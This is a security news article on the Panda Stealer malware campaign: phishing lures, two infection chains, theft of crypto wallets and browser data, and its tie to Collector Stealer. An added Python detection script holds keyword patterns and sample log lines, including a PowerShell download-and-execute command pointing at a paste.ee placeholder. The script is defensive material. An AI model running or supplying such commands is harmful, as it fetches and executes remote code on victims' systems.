In the latest reports, it has been found that the Panda Stealer malware has been targeting big-time applications like Discord, as well as cryptocurrency wallets in a global scam campaign.
The attack campaign of Panda Stealer primarily targets users in Australia, Germany, Japan, and the United States.
The information stealer was reportedly found by security researchers at Trend Micro at the beginning of April.
A Two-Stage infection chain:
The malware begins its infection chain through phishing emails; analysis of the samples also indicates that victims have been downloading executables from malicious websites via Discord links.
Panda Stealer’s phishing emails pretend to be business quote requests.
A similar technique was apparently used by the recently discovered Phobos ransomware campaign.
The researchers had detected two infection chains being used by the campaign.
Detailing how the “Panda Stealer” malware operates in these two chains, the researchers noted that in the first, a .XLSM attachment containing macros downloads a loader, which subsequently downloads and executes the main stealer.
“The other infection chain involves an attached .XLS file containing an Excel formula that utilizes a PowerShell command to access paste.ee, a Pastebin alternative, that accesses a second encrypted PowerShell command,” noted the security researchers.
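As an added example (not from the report or from Trend Micro's analysis), the following Python snippet flags the Excel-to-PowerShell-to-paste.ee pattern described in the second chain when run over process-creation events; the events are constructed here, and the extra paste host and the download/encoded-command keywords are assumptions beyond what the report names.

```python
"""Flag the Excel -> PowerShell -> paste site pattern in process-creation logs."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str    # parent process image name
    image: str     # spawned process image name
    cmdline: str   # full command line as logged

# Indicators from the infection chain described above. The report names
# paste.ee; pastebin.com and the keyword list are assumptions for illustration.
OFFICE_PARENTS = {"excel.exe", "winword.exe"}
SHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
PASTE_HOSTS = ("paste.ee", "pastebin.com")
DOWNLOAD_HINTS = re.compile(
    r"\b(downloadstring|invoke-webrequest|iwr|iex|invoke-expression|encodedcommand)\b|-enc\b",
    re.IGNORECASE,
)


def score_event(ev: ProcEvent) -> list:
    """Return the reasons this event is suspicious; an empty list means no match."""
    parent, image, cmd = ev.parent.lower(), ev.image.lower(), ev.cmdline.lower()
    reasons = []
    if parent in OFFICE_PARENTS and image in SHELL_IMAGES:
        reasons.append("office application spawned PowerShell")
    if image in SHELL_IMAGES and any(host in cmd for host in PASTE_HOSTS):
        reasons.append("PowerShell command line references a paste site")
    if image in SHELL_IMAGES and DOWNLOAD_HINTS.search(cmd):
        reasons.append("download-and-execute or encoded PowerShell command")
    return reasons


def detect(events):
    """Return (event, reasons) pairs for every event that matched at least one rule."""
    return [(ev, r) for ev in events if (r := score_event(ev))]


# Constructed sample events, not taken from the report; URL and payload are placeholders.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "excel.exe", r'"C:\Program Files\Microsoft Office\EXCEL.EXE" quote_request.xls'),
    ProcEvent("excel.exe", "powershell.exe", "powershell -w hidden -enc BASE64_PLACEHOLDER"),
    ProcEvent("excel.exe", "powershell.exe",
              "powershell IEX (New-Object Net.WebClient).DownloadString('https://paste.ee/r/PLACEHOLDER')"),
    ProcEvent("explorer.exe", "powershell.exe", "powershell Get-ChildItem C:\\Users"),
]

if __name__ == "__main__":
    for ev, reasons in detect(SAMPLE_EVENTS):
        print(f"{ev.parent} -> {ev.image}: {'; '.join(reasons)}")
```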
Malicious capabilities and similarities with Collector Stealer:
Once installed, the Panda Stealer malware can gather data such as private keys and records of past transactions from the victim’s various digital currency wallets, including Dash, Bytecoin, Litecoin, and Ethereum.
Panda Stealer can also take screenshots of the impacted systems and exfiltrate browser data such as cookies, passwords and card details.
By analyzing its active command-and-control (C2) servers, the researchers also linked the campaign to an IP address assigned to a virtual private server.
The virtual private server was rented from Shock Hosting; once this was determined, the web hosting company suspended the server assigned to the IP address.
Because of the analogous architecture, the Panda Stealer malware was determined to be a variant of Collector Stealer, which was cracked by the Russian threat actor NCP, also known as su1c1de.
“Because the cracked Collector Stealer builder is openly accessible online, cybercriminal groups and script kiddies alike can use it to create their own customized version of the stealer and C&C panel,” noted researchers.
While the two stealers behave similarly, they have different command and control server URLs, build tags, and execution folders.